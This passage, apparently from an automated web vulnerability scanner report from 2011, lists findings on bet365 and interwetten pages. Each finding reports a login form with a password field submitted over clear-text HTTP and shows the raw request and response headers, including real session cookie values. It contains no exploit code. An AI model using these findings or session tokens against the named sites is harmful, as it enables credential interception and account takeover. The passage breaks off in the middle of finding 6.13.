Set-Cookie: ASP.NET_SessionId=4rvtrm45hxdjs5axh0krts45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10237
Set-Cookie: BIGipServerPool_affiliates.interwetten.com=1727730092.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$txtPassword" type="password" id="ctl00_txtPassword" class="field" style="width:169px;" />

<input type="submit" name="ctl00$Button1" value="Login" id="ctl00_Button1" class="button1" />
...[SNIP]...

6.2. http://bingo.bet365.com/play/en/home/

Summary

Severity:   High
Confidence:   Certain
Host:   http://bingo.bet365.com
Path:   /play/en/home/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /play/en/home/ HTTP/1.1
Host: bingo.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:26 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uhx0t5ntbzbisd55vri2jy55; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=FE57C4F4DDFF44EDB9007B44EEA8BA12000002; path=/
Set-Cookie: session=stk=FE57C4F4DDFF44EDB9007B44EEA8BA12000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:35:26 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:35:26 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:35:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 130943


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Bingo at bet36
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/play/en/home/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" />

<a onclick="if (CreateLoginProcess('', '%2fplay%2fen%2fhome%2f', '', false, this.id)) { SetHiddenPassword(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;); return true
...[SNIP]...

6.3. http://casino.bet365.com/extra/en/online-games/baccarat

Summary

Severity:   High
Confidence:   Certain
Host:   http://casino.bet365.com
Path:   /extra/en/online-games/baccarat

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /extra/en/online-games/baccarat HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cbmjzc45ptk3gqmomxrqk1mx; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=738A9FB42BA343DABCD3136AA3621ACE000002; path=/
Set-Cookie: session=stk=738A9FB42BA343DABCD3136AA3621ACE000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/online-games/baccarat/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

6.4. http://casino.bet365.com/extra/en/online-games/blackjack

Summary

Severity:   High
Confidence:   Certain
Host:   http://casino.bet365.com
Path:   /extra/en/online-games/blackjack

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /extra/en/online-games/blackjack HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=oltt0c55lt0sebb3qyxf2u45; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=A71662CB8A884A4A9D4A3B4BA20AEE87000002; path=/
Set-Cookie: session=stk=A71662CB8A884A4A9D4A3B4BA20AEE87000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:23 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:23 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 86154


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/online-games/blackjack/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

6.5. http://casino.bet365.com/extra/en/online-games/live-dealer

Summary

Severity:   High
Confidence:   Certain
Host:   http://casino.bet365.com
Path:   /extra/en/online-games/live-dealer

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /extra/en/online-games/live-dealer HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bwkilnzzw312lbao5zygnc3u; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=AE7AAAF18ED44B4CA0DFD512563D0E3F000002; path=/
Set-Cookie: session=stk=AE7AAAF18ED44B4CA0DFD512563D0E3F000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 93559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/online-games/live-dealer/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

6.6. http://casino.bet365.com/extra/en/online-games/roulette

Summary

Severity:   High
Confidence:   Certain
Host:   http://casino.bet365.com
Path:   /extra/en/online-games/roulette

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /extra/en/online-games/roulette HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kcnaqt55ip33v1nmqm3ozt45; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=08ACA4CA6B6B4BC394152B73FAC0A82C000002; path=/
Set-Cookie: session=stk=08ACA4CA6B6B4BC394152B73FAC0A82C000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:24 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:24 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 85710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/online-games/roulette/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

6.7. http://casino.bet365.com/home/en/

Summary

Severity:   High
Confidence:   Certain
Host:   http://casino.bet365.com
Path:   /home/en/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /home/en/ HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:23 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5xuac3551kzj4cm3dpese255; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=840278C39B9946C182A492B2D9FF91B8000002; path=/
Set-Cookie: session=stk=840278C39B9946C182A492B2D9FF91B8000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:22 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:22 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:23 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 227712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/home/en/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" />

<a onclick="if (CreateLoginProcess('', '%2fhome%2fen%2f', '', false, this.id)) { SetHiddenPassword(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;); return true;} else
...[SNIP]...

6.8. http://games.bet365.com/home/en/

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.bet365.com
Path:   /home/en/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /home/en/ HTTP/1.1
Host: games.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:20 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jqaokq45oa00yd45k1sqtdbv; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=7FFFF94400DA44DBABA668D6BF938444000002; path=/
Set-Cookie: session=stk=7FFFF94400DA44DBABA668D6BF938444000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:02:19 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:02:19 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:02:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 338090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/home/en/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" />

<a onclick="if (CreateLoginProcess('', '%2fhome%2fen%2f', '', false, this.id)) { SetHiddenPassword(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;); return true;} else
...[SNIP]...

6.9. http://poker.bet365.com/home/en/

Summary

Severity:   High
Confidence:   Certain
Host:   http://poker.bet365.com
Path:   /home/en/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /home/en/ HTTP/1.1
Host: poker.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:32 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nyfxkkm5jpltjay123ux5555; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=21BAFE3BE630423EA6F6F56A8ADE1FFB000002; path=/
Set-Cookie: session=stk=21BAFE3BE630423EA6F6F56A8ADE1FFB000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:20:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 102583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/home/en/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" />

<a onclick="if (CreateLoginProcess('', '%2fhome%2fen%2f', '', false, this.id)) { SetHiddenPassword(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;); return true;} else
...[SNIP]...

6.10. http://www.bet365.com/extra/en/betting/in-play

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/betting/in-play

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /extra/en/betting/in-play HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:22 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:22 GMT; path=/
Set-Cookie: ASP.NET_SessionId=unylycjqefpfxs45dlzrct45; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:22 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:22 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 102612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/betting/in-play/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

6.11. http://www.bet365.com/extra/en/betting/live-streaming

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/betting/live-streaming

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /extra/en/betting/live-streaming HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:23 GMT; path=/
Set-Cookie: ASP.NET_SessionId=arbxtv45ukmqrsq55mwos0iy; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:23 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:23 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 101179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/betting/live-streaming/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

6.12. http://www.bet365.com/extra/en/mobile/introduction/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/mobile/introduction/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /extra/en/mobile/introduction/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:25 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3ysuis55m3k5e4u42bup5i55; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 65383


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/mobile/introduction/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

6.13. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/promotions/horse-racing/best-odds-guaranteed

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /extra/en/promotions/horse-racing/best-odds-guaranteed HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:26 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=5fxxsc45xzcdzr55sixclp45; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 115152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
